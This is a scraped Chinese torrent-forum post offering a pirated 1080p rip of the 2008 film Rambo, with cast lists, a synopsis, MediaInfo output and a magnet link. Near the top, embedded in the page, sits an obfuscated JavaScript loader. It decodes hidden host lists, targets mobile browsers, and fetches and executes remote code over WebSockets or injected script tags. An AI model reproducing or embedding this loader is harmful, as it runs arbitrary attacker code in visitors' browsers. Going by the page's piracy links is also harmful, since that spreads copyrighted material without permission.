第一滴血4[国英多音轨/简繁字幕].Rambo.2008.BluRay.1080p.2Audio.DTS-HD.MA.7.1.x265.10bit 11.68GB

版主小s 1月前 289

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 第一滴血4 / 第四滴血 / 兰博4 / RAMBO 热血回归 / Rambo IV / John Rambo / Rambo The Fight Continues
◎片  名 Rambo
◎年  代 2008
◎产  地 美国 / 德国
◎类  别 动作 / 惊悚
◎语  言 英语 / 缅甸语 / 泰语
◎上映日期 2008-01-25(美国)
◎IMDb链接 https://www.imdb.com/title/tt0462499/
◎豆瓣评分 7.5/10 (44281人评价)
◎豆瓣链接 https://movie.douban.com/subject/1440855/
◎片  长 92分钟
◎导  演 西尔维斯特·史泰龙 Sylvester Stallone (id:1047996)
◎编  剧 亚特·蒙特拉斯特里 Art Monterastelli (id:1042061)
       西尔维斯特·史泰龙 Sylvester Stallone (id:1047996)
       大卫·莫瑞尔 David Morrell (id:1045577)
◎演  员 西尔维斯特·史泰龙 Sylvester Stallone (id:1047996)
       朱莉·本茨 Julie Benz (id:1044710)
       马修·马斯登 Matthew Marsden (id:1031949)
       格拉汉姆·麦克泰维什 Graham McTavish (id:1323191)
       詹姆斯·维斯 James With (id:1005388)
       保罗·舒尔茨 Paul Schulze (id:1320838)
       蒂姆·康 Tim Kang (id:1032012)
       Supakorn Kitsuwon Supakorn Kitsuwon (id:1288658)
       马修·沃尔夫 Matthew Wolf (id:1161921)
       肯·霍华德 Ken Howard (id:1096159)
       大卫·莫瑞尔 David Morrell (id:1045577)
       乔恩·费勒梅 Jon Feltheimer (id:1050954)
       兰道尔·艾米特 Randall Emmett (id:1000666)
       博兹·大卫逊 Boaz Davidson (id:1040974)
       约翰·汤普森 John Thompson (id:1299184)
       鲍伯·韦恩斯坦 Bob Weinstein (id:1300654)
       艾威·勒纳 Avi Lerner (id:1027972)
       克里斯托弗·佩泽尔 Christopher Petzel (id:1023789)
       哈维·韦恩斯坦 Harvey Weinstein (id:1054304)
       布莱恩·泰勒 Brian Tyler (id:1276412)
       杰瑞·高德史密斯 Jerry Goldsmith (id:1007116)
       格伦·麦克弗森 Glen MacPherson (id:1041789)
       Sean Albertson Sean Albertson (id:1042410)
       希拉·贾菲 Sheila Jaffe (id:1287540)
       弗朗哥·贾科莫·卡本 Franco-Giacomo Carbone (id:1280068)
       Scott H. Eddo Scott H. Eddo (id:1089511)
       格兰特·麦丘恩 Grant McCune (id:1291510)
       Bill Taylor Bill Taylor (id:1298968)
        Migs Rustia (id:1230977)
       Shero Rauf Shero Rauf (id:1212441)
       丹尼·S·金 Danny S. Kim (id:1288541)
       萨里特·沃林 Sumrit Warin (id:1374656)

◎标  签 动作 / 史泰龙 / 美国 / 战争 / 美国电影 / 兰博4 / 2008 / Rambo

◎简  介
  军政府统治下的缅甸,其西部由于蕴含丰富资源而被军队觊觎多年,那里的儿童经常被军队强征入伍,针对平民的屠杀已经成了部分军人的娱乐……一支教会义工小队为了进入该地区向难民提供人道主义帮助,在泰国找到了隐居的兰博(西尔维斯特?史泰龙 Sylvester Stallone 饰),希望熟悉河道的后者提供帮助。兰博认为时局没有改变的可能,拒绝带路,但终被义工莎拉(Julie Benz 饰)的诚意打动,将他们送达。                                    
                                岂料这支义工小队在村庄中遭到军队的袭击,生还者全部被掳走。教会获悉义工们身陷险境,组织雇佣兵营救,并再次委托兰博带路,这一次,兰博的态度发生了转变,他率领雇佣兵们潜入缅甸军营,又一次化身热血战士。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 138608213023104155809265327071323227444 (0x6846F88657F3D7F028F0E66411680534)

  4. Complete name                            : [email protected]QDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 11.7 GiB

  8. Duration                                 : 1 h 39 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 16.8 Mb/s

  11. Encoded date                             : UTC 2021-07-28 07:29:40

  12. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 39 min

  21. Bit rate                                 : 10.1 Mb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 798 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.274

  31. Stream size                              : 6.99 GiB (60%)

  32. Title                                    : HEVC, [email protected]@High, 24/1.001 fps @ 10078 kbps

  33. Writing library                          : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings                        : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x798 / interlace=0 / total-frames=142820 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language                                 : English

  36. Default                                  : Yes

  37. Forced                                   : No

  38. Color range                              : Limited

  39. Color primaries                          : BT.709

  40. Transfer characteristics                 : BT.709

  41. Matrix coefficients                      : BT.709


  42. Audio #1

  43. ID                                       : 2

  44. Format                                   : DTS XLL

  45. Format/Info                              : Digital Theater Systems

  46. Commercial name                          : DTS-HD Master Audio

  47. Codec ID                                 : A_DTS

  48. Duration                                 : 1 h 39 min

  49. Bit rate mode                            : Variable

  50. Bit rate                                 : 5 921 kb/s

  51. Channel(s)                               : 8 channels

  52. Channel layout                           : C L R LFE Lb Rb Lss Rss

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 93.750 FPS (512 SPF)

  55. Bit depth                                : 24 bits

  56. Compression mode                         : Lossless

  57. Stream size                              : 4.11 GiB (35%)

  58. Title                                    : English DTS-HD Master Audio 7.1 @ 5921 kbps

  59. Language                                 : English

  60. Default                                  : Yes

  61. Forced                                   : No


  62. Audio #2

  63. ID                                       : 3

  64. Format                                   : DTS

  65. Format/Info                              : Digital Theater Systems

  66. Codec ID                                 : A_DTS

  67. Duration                                 : 1 h 39 min

  68. Bit rate mode                            : Constant

  69. Bit rate                                 : 754 kb/s

  70. Channel(s)                               : 6 channels

  71. Channel layout                           : C L R Ls Rs LFE

  72. Sampling rate                            : 48.0 kHz

  73. Frame rate                               : 93.750 FPS (512 SPF)

  74. Bit depth                                : 24 bits

  75. Compression mode                         : Lossy

  76. Stream size                              : 536 MiB (4%)

  77. Title                                    : Mandarin DTS 5.1 @ 768 kbps

  78. Language                                 : Chinese

  79. Default                                  : No

  80. Forced                                   : No


  81. Text #1

  82. ID                                       : 4

  83. Format                                   : PGS

  84. Codec ID                                 : S_HDMV/PGS

  85. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration                                 : 1 h 25 min

  87. Bit rate                                 : 19.0 kb/s

  88. Count of elements                        : 1122

  89. Stream size                              : 11.6 MiB (0%)

  90. Title                                    : Eng/SUP

  91. Language                                 : English

  92. Default                                  : No

  93. Forced                                   : No


  94. Text #2

  95. ID                                       : 5

  96. Format                                   : PGS

  97. Codec ID                                 : S_HDMV/PGS

  98. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration                                 : 1 h 25 min

  100. Bit rate                                 : 23.1 kb/s

  101. Count of elements                        : 1425

  102. Stream size                              : 14.1 MiB (0%)

  103. Title                                    : Eng/SUP  SDH

  104. Language                                 : English

  105. Default                                  : No

  106. Forced                                   : No


  107. Text #3

  108. ID                                       : 6

  109. Format                                   : PGS

  110. Codec ID                                 : S_HDMV/PGS

  111. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration                                 : 1 h 26 min

  113. Bit rate                                 : 26.6 kb/s

  114. Count of elements                        : 1698

  115. Stream size                              : 16.4 MiB (0%)

  116. Title                                    : Chs/SUP  简体

  117. Language                                 : Chinese

  118. Default                                  : Yes

  119. Forced                                   : No


  120. Text #4

  121. ID                                       : 7

  122. Format                                   : PGS

  123. Codec ID                                 : S_HDMV/PGS

  124. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  125. Duration                                 : 1 h 26 min

  126. Bit rate                                 : 27.6 kb/s

  127. Count of elements                        : 1698

  128. Stream size                              : 17.0 MiB (0%)

  129. Title                                    : Cht/SUP  繁体

  130. Language                                 : Chinese

  131. Default                                  : No

  132. Forced                                   : No


  133. Menu

  134. 00:00:00.000                             : en:第 01 章

  135. 00:06:05.365                             : en:第 02 章

  136. 00:13:15.586                             : en:第 03 章

  137. 00:19:38.844                             : en:第 04 章

  138. 00:22:54.456                             : en:第 05 章

  139. 00:30:59.023                             : en:第 06 章

  140. 00:37:30.081                             : en:第 07 章

  141. 00:43:18.929                             : en:第 08 章

  142. 00:48:02.713                             : en:第 09 章

  143. 00:50:31.069                             : en:第 10 章

  144. 00:55:54.225                             : en:第 11 章

  145. 01:03:08.910                             : en:第 12 章

  146. 01:08:06.040                             : en:第 13 章

  147. 01:16:30.877                             : en:第 14 章

  148. 01:22:51.883                             : en:第 15 章

  149. 01:27:18.149                             : en:第 16 章



TAGS 动作 惊悚

磁力链:
  • magnet:?xt=urn:btih:3BF62DC43519BCE97B1A1AFD2910EC01CB42F510
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回